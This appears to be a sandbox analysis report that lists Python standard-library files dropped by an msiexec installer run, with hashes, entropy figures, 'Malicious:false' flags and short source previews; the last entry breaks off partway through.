                                                                                                                                Preview:__all__ = ('Queue', 'PriorityQueue', 'LifoQueue', 'QueueFull', 'QueueEmpty')....import collections..import heapq..from types import GenericAlias....from . import locks..from . import mixins......class QueueEmpty(Exception):.. """Raised when Queue.get_nowait() is called on an empty Queue.""".. pass......class QueueFull(Exception):.. """Raised when the Queue.put_nowait() method is called on a full Queue.""".. pass......class Queue(mixins._LoopBoundMixin):.. """A queue, useful for coordinating producer and consumer coroutines..... If maxsize is less than or equal to zero, the queue size is infinite. If it.. is an integer greater than 0, then "await put()" will block when the.. queue reaches maxsize, until an item is removed by get()..... Unlike the standard library Queue, you can reliably know this Queue's size.. with qsize(), since your single-threaded asyncio application won't be.. interrupted between calling qsize() and doing an operation on the Queue..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7053
                                                                                                                                Entropy (8bit):4.4313236937115414
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:W9aaus+1IZ8S3+eb1NHFh8p9w+p/Hya4ALexIhqN:qaAOIZaslKaCBeB
                                                                                                                                MD5:44E94A2A1D22895E767B2C7A24C9CDB9
                                                                                                                                SHA1:18944C35444ED78C17A8B7E3CE841A19F5993CA8
                                                                                                                                SHA-256:23B8E62D8918582DF38AE52EE7F970B091E6030EA6AEF7C6725A671649B41888
                                                                                                                                SHA-512:FAC27552FBE9DA20151993E67D10125AC25D5F8FC403491CB4685252A359E2BF46AAD079945716EB975904167829A6E0044300F43EE3C868C2A2A2A1FE981529
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = ('Runner', 'run')....import contextvars..import enum..import functools..import threading..import signal..import sys..from . import coroutines..from . import events..from . import exceptions..from . import tasks......class _State(enum.Enum):.. CREATED = "created".. INITIALIZED = "initialized".. CLOSED = "closed"......class Runner:.. """A context manager that controls event loop life cycle..... The context manager always creates a new event loop,.. allows to run async functions inside it,.. and properly finalizes the loop at the context manager exit..... If debug is True, the event loop will be run in debug mode... If loop_factory is passed, it is used for new event loop creation..... asyncio.run(main(), debug=True).... is a shortcut for.... with asyncio.Runner(debug=True) as runner:.. runner.run(main()).... The run() method can be called multiple times within the runner's context..... This can be useful for interactive console (
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46149
                                                                                                                                Entropy (8bit):4.289389454146726
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:QwG1ILr35d/lG+YKFHnKdmNO1LTEY8A3sz5+0O+2:QDC759N5q
                                                                                                                                MD5:8A0EC8F971F3CEDDD083A52B8001C411
                                                                                                                                SHA1:1FB3120CB659AF09DFD730675A830BFE9609646E
                                                                                                                                SHA-256:4F43357CA196D53BCB15C350F4A019DB2BCEF258F7124590D6E99D5201702BFB
                                                                                                                                SHA-512:E23146C7E7015348F898CE89EAE2B48E539E7BAB78AFDA37284EF9774854A9B84D7D28EE36764416437769C94FFF3446165E2580150DB0FD8D7035915F4CA72B
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Event loop using a selector and related classes.....A selector is a "notify-when-ready" multiplexer. For a subclass which..also includes support for signal handling, see the unix_events sub-module..."""....__all__ = 'BaseSelectorEventLoop',....import collections..import errno..import functools..import selectors..import socket..import warnings..import weakref..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import base_events..from . import constants..from . import events..from . import futures..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _test_selector_event(selector, fd, event):.. # Test if the selector is monitoring 'event' events.. # for the file descriptor 'fd'... try:.. key = selector.get_key(fd).. except KeyError:.. return False.. else:.. return bool(key.events & event)......class BaseSelectorEventLoop(base_events.Ba
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32566
                                                                                                                                Entropy (8bit):4.438309110936202
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rb9lsu9k/6CTl0/J/AgUYi00QQUP/S/puJBhzX+Shn04o/dCMcc02F/8NNdbpap7:RhTf0UZ0VxoIz1bp0FxPKCVmsxg
                                                                                                                                MD5:03E3C6170D3D1E468AFFAC14CE12914A
                                                                                                                                SHA1:ED5FC49875704215E482C6E16BDEEB113B0C186B
                                                                                                                                SHA-256:15A9A7E933E75DA60034BD56E00C71A8A67D032DF63B634CABCA1C43E38A16F0
                                                                                                                                SHA-512:DE4E2E931F3BCF608CA8CDE007F21225DC0A0B4CD2533EB9785CBA211ACF3DE751B320C24F0C6E6FE49F7589B0BDB8D793FDB0702B0C1F59C2C2321DE704AC30
                                                                                                                                Malicious:false
                                                                                                                                Preview:import collections..import enum..import warnings..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import constants..from . import exceptions..from . import protocols..from . import transports..from .log import logger....if ssl is not None:.. SSLAgainErrors = (ssl.SSLWantReadError, ssl.SSLSyscallError)......class SSLProtocolState(enum.Enum):.. UNWRAPPED = "UNWRAPPED".. DO_HANDSHAKE = "DO_HANDSHAKE".. WRAPPED = "WRAPPED".. FLUSHING = "FLUSHING".. SHUTDOWN = "SHUTDOWN"......class AppProtocolState(enum.Enum):.. # This tracks the state of app protocol (https://git.io/fj59P):.. #.. # INIT -cm-> CON_MADE [-dr*->] [-er-> EOF?] -cl-> CON_LOST.. #.. # * cm: connection_made().. # * dr: data_received().. # * er: eof_received().. # * cl: connection_lost().... STATE_INIT = "STATE_INIT".. STATE_CON_MADE = "STATE_CON_MADE".. STATE_EOF = "STATE_EOF".. STATE_CON_LOST = "STATE_CON_LOST"......def _create_tran
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16854
                                                                                                                                Entropy (8bit):4.591700186617618
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:rWXUZapLbg8+fiIqNlzE5nOfE71OG6zC0rXnJUTZMaq5gMtbBh:rWXnxg8+fiIq7bK0G6znXJUTZMa+tNh
                                                                                                                                MD5:056D491AED9FBA8392D9D5DF2E4FE926
                                                                                                                                SHA1:55370957FDBAD8B3567887460128D83485A1921B
                                                                                                                                SHA-256:6674F36F8EEB971C92C554EE4B8CDF0E9D72579237D3F0BD64EDDE8FA573291B
                                                                                                                                SHA-512:1ECD610D2AD457331B24664B7071764F37BB4E527EF905C5BCC6350CC1115F50B4F5573C175A3CDC945F1B49187E3AA3850B40E85BC82AAB47468490F5DBA211
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2006 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Unit tests for pytree.py.....NOTE: Please *don't* add doc strings to individual test methods!..In verbose mode, printing of the module, class and method name is much..more helpful than printing of (the first line of) the docstring,..especially when debugging a test..."""....# Testing imports..from . import support....from lib2to3 import pytree....try:.. sorted..except NameError:.. def sorted(lst):.. l = list(lst).. l.sort().. return l....class TestNodes(support.TestCase):.... """Unit tests for nodes (Base, Leaf, Node).""".... def test_instantiate_base(self):.. if __debug__:.. # Test that instantiating Base() raises an AssertionError.. self.assertRaises(AssertionError, pytree.Base).... def test_leaf(self):.. l1 = pytree.Leaf(100, "foo").. self.assertEqual(l1.type, 100).. self.assertEqual(l1.value,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12923
                                                                                                                                Entropy (8bit):4.572035366718209
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:53NgKosUuFhXnWm+HpTSBB+DtI546k6dsv+JR8ZczC2dUED:53CVshWm+wB0oK6b8cWED
                                                                                                                                MD5:0A86C4D36CDB1F9FB37CF3A8A6834F6E
                                                                                                                                SHA1:6180B0665A95AD3790608ECB334A18229AD9C159
                                                                                                                                SHA-256:1FEC925602984A96A02416B4CB314D685DBD3BCD18798BFB968D62708A2CCC70
                                                                                                                                SHA-512:2B6E491519A5FA4EDE7B39528B56427BB40B79BC4524E473769194A1D8F8A37E47A1B6678563CABBCF9D9C20CBBD11876FEE043F6FE059C265A73FF40151026F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Unit tests for refactor.py..."""....import sys..import os..import codecs..import io..import re..import tempfile..import shutil..import unittest....from lib2to3 import refactor, pygram, fixer_base..from lib2to3.pgen2 import token......TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")..FIXER_DIR = os.path.join(TEST_DATA_DIR, "fixers")....sys.path.append(FIXER_DIR)..try:.. _DEFAULT_FIXERS = refactor.get_fixers_from_package("myfixes")..finally:.. sys.path.pop()...._2TO3_FIXERS = refactor.get_fixers_from_package("lib2to3.fixes")....class TestRefactoringTool(unittest.TestCase):.... def setUp(self):.. sys.path.append(FIXER_DIR).... def tearDown(self):.. sys.path.pop().... def check_instances(self, instances, classes):.. for inst, cls in zip(instances, classes):.. if not isinstance(inst, cls):.. self.fail("%s are not instances of %s" % instances, classes).... def rt(self, options=None, fixers=_DEFAULT_FIXERS, e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21798
                                                                                                                                Entropy (8bit):4.302196287406583
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:m4lKMct4MKAcYTB6lJKJPAGIWtT2McNrg95+erhu2bxdUzSVzPsTWcNVwnmndDay:i/K38lx1weFXnxnloht
                                                                                                                                MD5:0072389179F00881BF8863F6495987FE
                                                                                                                                SHA1:0E2FD7809395C6702AD7E78A34902378DB85A6B2
                                                                                                                                SHA-256:AFF4F51F20165541536F028DA152DAB5F8BBA7B889B1BE203FE05ABAE0788558
                                                                                                                                SHA-512:1D917587582DA3A463B62183154AD80F8B606139296AE91C794C70FBA2282ACF510264EA56AF7C28090E93A505999D1BA9820C0E9427619A1B549C8F8C67BE0A
                                                                                                                                Malicious:false
                                                                                                                                Preview:""" Test suite for the code in fixer_util """....# Testing imports..from . import support....# Local imports..from lib2to3.pytree import Node, Leaf..from lib2to3 import fixer_util..from lib2to3.fixer_util import Attr, Name, Call, Comma..from lib2to3.pgen2 import token....def parse(code, strip_levels=0):.. # The topmost node is file_input, which we don't care about... # The next-topmost node is a *_stmt node, which we also don't care about.. tree = support.parse_string(code).. for i in range(strip_levels):.. tree = tree.children[0].. tree.parent = None.. return tree....class MacroTestCase(support.TestCase):.. def assertStr(self, node, string):.. if isinstance(node, (tuple, list)):.. node = Node(fixer_util.syms.simple_stmt, node).. self.assertEqual(str(node), string)......class Test_is_tuple(support.TestCase):.. def is_tuple(self, string):.. return fixer_util.is_tuple(parse(string, strip_levels=2)).... def test_valid(self)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5872
                                                                                                                                Entropy (8bit):4.318351105582314
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:459KnwPrY0wNyGv0/lTqhlBI2hgOwTYjbnknCG/l2IhLySDQ/v5R4/yi:Q9KnBg9qh5wTinknCG/1VySDQ/v8/yi
                                                                                                                                MD5:E54F85B0CA944E38241E4E7322026758
                                                                                                                                SHA1:55F288E471BB0E2B426F69AAC6F22BCB7A71DADE
                                                                                                                                SHA-256:9ED3BA77F235C8FCC60D00BD6B9AA9495C717B59C8AC9EFB7C6FFDFE9B82B034
                                                                                                                                SHA-512:54E47DD813DFEBC5147296E32A445F3A10FB89C48140EB9F5276B7CE564F74DC3955722C340DDA26541495A5B8C658ED70BF74090AAD505654EBFCCFA1246E1F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Cache lines from Python source files.....This is intended to read lines from modules imported -- hence if a filename..is not found, it will look down the module search path for a file by..that name..."""....import functools..import sys..import os..import tokenize....__all__ = ["getline", "clearcache", "checkcache", "lazycache"]......# The cache. Maps filenames to either a thunk which will provide source code,..# or a tuple (size, mtime, lines, fullname) once loaded...cache = {}......def clearcache():.. """Clear the cache entirely.""".. cache.clear()......def getline(filename, lineno, module_globals=None):.. """Get a line for a Python source file from the cache... Update the cache if it doesn't contain an entry for this file already.""".... lines = getlines(filename, module_globals).. if 1 <= lineno <= len(lines):.. return lines[lineno - 1].. return ''......def getlines(filename, module_globals=None):.. """Get the lines for a Python source file from the
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):80787
                                                                                                                                Entropy (8bit):4.372011564240107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:KcRttodRiVJ8forhoJiVz3Puxh+H66YsvqkYV+dOPzwlorNpdADdNZn8VF4hr9co:KcRtX9oiu7imJsOYZFhr9pUT9FW
                                                                                                                                MD5:9C7133F216A9F37C4A30420550A0EB3F
                                                                                                                                SHA1:2CA4E5283954F75DACB5BC61972D97741C10D25E
                                                                                                                                SHA-256:899D81AC7FE6669377D1241FADD723096FC6DF0293E24244373FF25E7B100376
                                                                                                                                SHA-512:C8C34A79E506B481929145256ACDA16C42E3606FF6BF8F6525BC4211DD281417E70866A7A6F807D1EAAAFA6E8CC53E00FF997094626BAAF894B739F8002C5EC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Locale support module.....The module provides low-level access to the C lib's locale APIs and adds high..level number formatting APIs as well as a locale aliasing engine to complement..these.....The aliasing engine includes support for many commonly used locale names and..maps them to values suitable for passing to the C lib's setlocale() function. It..also includes default encodings for all supported locale names....."""....import sys..import encodings..import encodings.aliases..import re..import _collections_abc..from builtins import str as _builtin_str..import functools....# Try importing the _locale module...#..# If this fails, fall back on a basic 'C' locale emulation.....# Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before..# trying the import. So __all__ is also fiddled at the end of the file...__all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error",.. "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm",..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):83096
                                                                                                                                Entropy (8bit):4.538615986292085
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:TTM4IEmscEBFwoxWJvH1Lt8CAUtxV3EkbUQR6+KVQhZ:TTM4AeoNH158yXVUs0qj
                                                                                                                                MD5:6C048B8BC6931757C1483BDDDBABCDC7
                                                                                                                                SHA1:1E2E2586993A360F9A2E10749EE51CF9678B294F
                                                                                                                                SHA-256:8C60DC68CB123D4026ABED0EC8338F47DAD23BBEFE35F54CA843D603837AE585
                                                                                                                                SHA-512:D3A44660DA45460C01784A61EECB38B78ECB358C84B0BD2E54B97808E20A22A8AEB9AACF683BEF8131607E93D77A3C05B9F9691BFC71E7061E29E365EC7063B2
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):37520
                                                                                                                                Entropy (8bit):4.314838834166126
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:TTFQcVmMtVTFxLmDAlisUCH7vZMPu42+xuGYV:TTFpxtVzLmDAlisUCH7uG42+A3V
                                                                                                                                MD5:B8D12E2240F095E59CF2EACC1C02CA1A
                                                                                                                                SHA1:2B3A6430BE2518EA1CD99C52B154E0F84ED75F16
                                                                                                                                SHA-256:4A45F92DFB29974CF500C02095449E81D9ED52D315680192881FC821F2E796B4
                                                                                                                                SHA-512:BEE67D78E223C78FC3A30058D988F68489A2C280142C9157473007C15A909A3D2FE9C41034E0462880B57EF6BBCDB9C25B7FAC12137492024B12E379217F657D
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):63560
                                                                                                                                Entropy (8bit):4.425908548639657
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yTAqnmKu/EaGYhxVRkXAHiZ9HB+nbGsbDDL2eLRBoleQZ:yTF7uS4xHk5cnbGsbDDL2cRBolh
                                                                                                                                MD5:7B6895D24E08762635FCB40C66573FD9
                                                                                                                                SHA1:7C4C4E370FD456478D83C2E647945BBA4C8C074D
                                                                                                                                SHA-256:1B33164F18D9C5EF60EB0E1EB75DB76F61F057B1C8A53DCEAFF8A920A8F47F49
                                                                                                                                SHA-512:4AE3507BFBB4663B8755234AE49E015AC8FE3E9905ED559B9E8DD9A2808C247EDE2816F85CCE456498C8F53DB18015CAAA1D9F0793FC8683AB53B19D6397591E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13633
                                                                                                                                Entropy (8bit):4.6079115173576595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:1aniQNwG7fMpo6Yx6ip/qkFQ1bN54ga15DPi7kMP4:Ki2N62QN+xMw
                                                                                                                                MD5:FACB9DDF63AA1A9A7BDA31E8B5D5D227
                                                                                                                                SHA1:26387A733267073DE41848DAF103582DBCED3AB6
                                                                                                                                SHA-256:DA46FA7C6C554A0705CF9A7318279B56FD5F62F71A55AC28E9579616F11129D6
                                                                                                                                SHA-512:E26E99D48775E2C3135DEF115F0B05550E5FEF1C0B9FD6178799E339A9F92F3FA05262E81C160B822F4D676763213D5252BC365F76571947F7AF386C1E0CB90D
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Interface to the liblzma compression library.....This module provides a class for reading and writing compressed files,..classes for incremental (de)compression, and convenience functions for..one-shot (de)compression.....These classes and functions support both the XZ and legacy LZMA..container formats, as well as raw compressed data streams..."""....__all__ = [.. "CHECK_NONE", "CHECK_CRC32", "CHECK_CRC64", "CHECK_SHA256",.. "CHECK_ID_MAX", "CHECK_UNKNOWN",.. "FILTER_LZMA1", "FILTER_LZMA2", "FILTER_DELTA", "FILTER_X86", "FILTER_IA64",.. "FILTER_ARM", "FILTER_ARMTHUMB", "FILTER_POWERPC", "FILTER_SPARC",.. "FORMAT_AUTO", "FORMAT_XZ", "FORMAT_ALONE", "FORMAT_RAW",.. "MF_HC3", "MF_HC4", "MF_BT2", "MF_BT3", "MF_BT4",.. "MODE_FAST", "MODE_NORMAL", "PRESET_DEFAULT", "PRESET_EXTREME",.... "LZMACompressor", "LZMADecompressor", "LZMAFile", "LZMAError",.. "open", "compress", "decompress", "is_check_supported",..]....import builtins..import io..import os..from _lzma
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):80945
                                                                                                                                Entropy (8bit):4.32888996076859
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:inRVh+YxnKyQE4XXH7R7roIfNJMVNMTGDSSoQvV/RzqDSsz/WJ:gRnlxnKyQEAbxrvJMVNMTSrdJz7sz/WJ
                                                                                                                                MD5:6F58186862F4DD316370EB2426974AD8
                                                                                                                                SHA1:1271E30BB63D4B3C7D79619A0E00C8740B76C1AF
                                                                                                                                SHA-256:1D5A2E2D2AA10962128083F200C3188B57543F80B6D9FADA3E0DB2BD3B4A8265
                                                                                                                                SHA-512:7E1B520ED42DCEC7ACC50E8FE5E975F3E2FEF3D05172A680CA1CF1ADC1AF988F414635C66CFCE5ADEDA395F442A7E9EDC7EA0B27021943FE45788797468926CF
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Read/write support for Maildir, mbox, MH, Babyl, and MMDF mailboxes."""....# Notes for authors of new mailbox subclasses:..#..# Remember to fsync() changes to disk before closing a modified file..# or returning from a flush() method. See functions _sync_flush() and..# _sync_close().....import os..import time..import calendar..import socket..import errno..import copy..import warnings..import email..import email.message..import email.generator..import io..import contextlib..from types import GenericAlias..try:.. import fcntl..except ImportError:.. fcntl = None....__all__ = ['Mailbox', 'Maildir', 'mbox', 'MH', 'Babyl', 'MMDF',.. 'Message', 'MaildirMessage', 'mboxMessage', 'MHMessage',.. 'BabylMessage', 'MMDFMessage', 'Error', 'NoSuchMailboxError',.. 'NotEmptyError', 'ExternalClashError', 'FormatError']....linesep = os.linesep.encode('ascii')....class Mailbox:.. """A group of messages in a particular place.""".... def __init__(self, path, facto
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9673
                                                                                                                                Entropy (8bit):4.412760045640702
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ild55VGNyMNKjLmlUk0qwNfpyBO6WBL2gbL9lWj+R/IDHMZYtfH6CzgEYLARQz:ildD7NflLd+j+RgDQA/6CsEYLARk
                                                                                                                                MD5:CD6E9B6E4581C03593A202C36C205D96
                                                                                                                                SHA1:E11E525829722F3DD2EF3C9211A38D9FF5023DD1
                                                                                                                                SHA-256:71FF58D205A8A8CE0426B75829B3319667E24B56FCF2248A046CBEC87EEFF5BE
                                                                                                                                SHA-512:31E0FA9FC9AC4A891A53E0A52431CC4338FC73824B26E57A4CF6183C5915CC8B0DC74762C3174FF8EA429C67A53E5C77B891629C3668492280D121E077B44636
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Mailcap file handling. See RFC 1524."""....import os..import warnings..import re....__all__ = ["getcaps","findmatch"]......_DEPRECATION_MSG = ('The {name} module is deprecated and will be removed in '.. 'Python {remove}. See the mimetypes module for an '.. 'alternative.')..warnings._deprecated(__name__, _DEPRECATION_MSG, remove=(3, 13))......def lineno_sort_key(entry):.. # Sort in ascending order, with unspecified entries at the end.. if 'lineno' in entry:.. return 0, entry['lineno'].. else:.. return 1, 0...._find_unsafe = re.compile(r'[^\xa1-\U0010FFFF\w@+=:,./-]').search....class UnsafeMailcapInput(Warning):.. """Warning raised when refusing unsafe input"""......# Part 1: top-level interface.....def getcaps():.. """Return a dictionary containing the mailcap database..... The dictionary maps a MIME type (in all lowercase, e.g. 'text/plain').. to a list of dictionaries corresponding to mailcap entries. The li
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23439
                                                                                                                                Entropy (8bit):4.4605556377039965
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:NdY3Vj3p7PEvA4bNqC+3c0t18PctlG8yklR5clRVSalR5lR1PIHmTnmMd0x00A/L:Nid3pUA4jI1Q8yI2Vd5pIBFwWfQ09e9b
                                                                                                                                MD5:0ECEE0CCEF8E722AEE4EED650B647AD7
                                                                                                                                SHA1:E01E2969599A691982BC9A7D72D9BDC6A1589215
                                                                                                                                SHA-256:641CD50CAE771C914C6C52BC4C3B985CC65F57EA9E6C71840E014608AB661C1B
                                                                                                                                SHA-512:8477A7C66F737A8600B05520CB3416332DA5DCB50505E18712C288FFE460E286362C5114BC5076076764596A3A970AA372877D59A2E2B99161373B4ECF59B864
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Guess the MIME type of a file.....This module defines two useful functions:....guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.....guess_extension(type, strict=True) -- guess the extension for a given MIME type.....It also contains the following, for tuning the behavior:....Data:....knownfiles -- list of files to parse..inited -- flag set when init() has been called..suffix_map -- dictionary mapping suffixes to suffixes..encodings_map -- dictionary mapping suffixes to encodings..types_map -- dictionary mapping suffixes to types....Functions:....init([files]) -- parse a list of files, default knownfiles (on Windows, the.. default values are taken from the registry)..read_mime_types(file) -- parse one file, return a dictionary or None.."""....import os..import sys..import posixpath..import urllib.parse....try:.. from _winapi import _mimetypes_read_windows_registry..except ImportError:.. _mimetypes_read_windows_registry = None....try:.. import winreg
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24365
                                                                                                                                Entropy (8bit):4.319981580600321
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:KXf39NmEvuo6xaWHV2EuKGTl+pdEupOsP02pgbK+6WP6dY9n/CLP:UHcPaWHV21KGTl+pd1pOsM2SGgP6dY9c
                                                                                                                                MD5:1452A6927F0A2E83240AEBC4D08E44FB
                                                                                                                                SHA1:92E5A833661D9B07270B1304544423E0C35770D6
                                                                                                                                SHA-256:3B0F9999C525F2C8DE5D2A26B4B820E17DD42B6A1E2F116C1F8008A49881EFFC
                                                                                                                                SHA-512:E204BCCF8EAD682D933150EB36F9EA4A22D479FC604E471B0D4523979C00748AEC2594E05C0757DA2B4ADDFBB67815834A1B0267DC1A7251A020E7502C2977D3
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Find modules used by a script, using introspection."""....import dis..import importlib._bootstrap_external..import importlib.machinery..import marshal..import os..import io..import sys....# Old imp constants:...._SEARCH_ERROR = 0.._PY_SOURCE = 1.._PY_COMPILED = 2.._C_EXTENSION = 3.._PKG_DIRECTORY = 5.._C_BUILTIN = 6.._PY_FROZEN = 7....# Modulefinder does a good job at simulating Python's, but it can not..# handle __path__ modifications packages make at runtime. Therefore there..# is a mechanism whereby you can register extra paths in this map for a..# package, and it will be honored.....# Note this is a mapping is lists of paths...packagePathMap = {}....# A Public interface..def AddPackagePath(packagename, path):.. packagePathMap.setdefault(packagename, []).append(path)....replacePackageMap = {}....# This ReplacePackage mechanism allows modulefinder to work around..# situations in which a package injects itself under the name..# of another package into sys.modules at runtime by
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18139
                                                                                                                                Entropy (8bit):4.511822063227519
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Xp7+G8kyIfWe6iWUdP1k3nof6oVmUb9jATp7b/PYeqhgv+OfutkD8geLDk7KsmX5:XYerP10of6yCp77UrOfuwmSndI
                                                                                                                                MD5:0E8FAD677C3201A413F15D4DBA2B57BE
                                                                                                                                SHA1:0030CED27B62F4A74DBFEF3B408406A7F5435EB6
